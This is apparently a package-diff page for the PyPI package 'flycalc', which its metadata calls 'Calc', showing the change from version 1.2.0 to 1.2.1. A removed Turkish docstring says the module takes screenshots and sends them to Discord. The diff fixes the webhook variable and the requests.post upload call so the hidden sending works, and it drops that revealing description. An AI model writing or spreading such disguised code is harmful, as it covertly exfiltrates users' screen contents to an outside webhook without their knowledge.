flycalc
Advanced tools
| Metadata-Version: 2.1 | ||
| Name: flycalc | ||
| Version: 1.2.0 | ||
| Version: 1.2.1 | ||
| Summary: Calc | ||
@@ -5,0 +5,0 @@ Home-page: https://github.com/flycalc/flycalc |
@@ -1,5 +0,1 @@ | ||
| """ | ||
| flycalc - Ekran görüntüsü alıp Discord'a gönderen hesap modülü | ||
| """ | ||
| from .core import question | ||
@@ -9,3 +5,3 @@ from .utils import FlyCalcError | ||
| __version__ = "1.2.0" | ||
| __version__ = "1.2.1" | ||
| __author__ = "flycalc Team" | ||
@@ -12,0 +8,0 @@ |
@@ -9,3 +9,3 @@ import os | ||
| DISCORDURL = os.getenv('DISCORD') | ||
| DISCORDURL = os.getenv('DISCORD_WEBHOOK') | ||
@@ -16,3 +16,3 @@ @classmethod | ||
| if not cls.DISCORDURL: | ||
| raise ValueError("DISCORD .env dosyasında bulunamadı!") | ||
| raise ValueError("DISCORD_WEBHOOK .env dosyasında bulunamadı!") | ||
| return True |
+1
-1
@@ -140,3 +140,3 @@ import os | ||
| response = requests.post(Config.DISCORD, data=data, files=files) | ||
| response = requests.post(Config.DISCORDURL, data=data, files=files) | ||
@@ -143,0 +143,0 @@ if response.status_code not in [200, 204]: |
+1
-1
| Metadata-Version: 2.1 | ||
| Name: flycalc | ||
| Version: 1.2.0 | ||
| Version: 1.2.1 | ||
| Summary: Calc | ||
@@ -5,0 +5,0 @@ Home-page: https://github.com/flycalc/flycalc |
+1
-1
@@ -8,3 +8,3 @@ from setuptools import setup, find_packages | ||
| name="flycalc", | ||
| version="1.2.0", | ||
| version="1.2.1", | ||
| author="flycalc Team", | ||
@@ -11,0 +11,0 @@ author_email="info@flycalc.com", |
Alert delta unavailable
Currently unable to show alert delta for PyPI packages.
10853
-0.6%212
-1.4%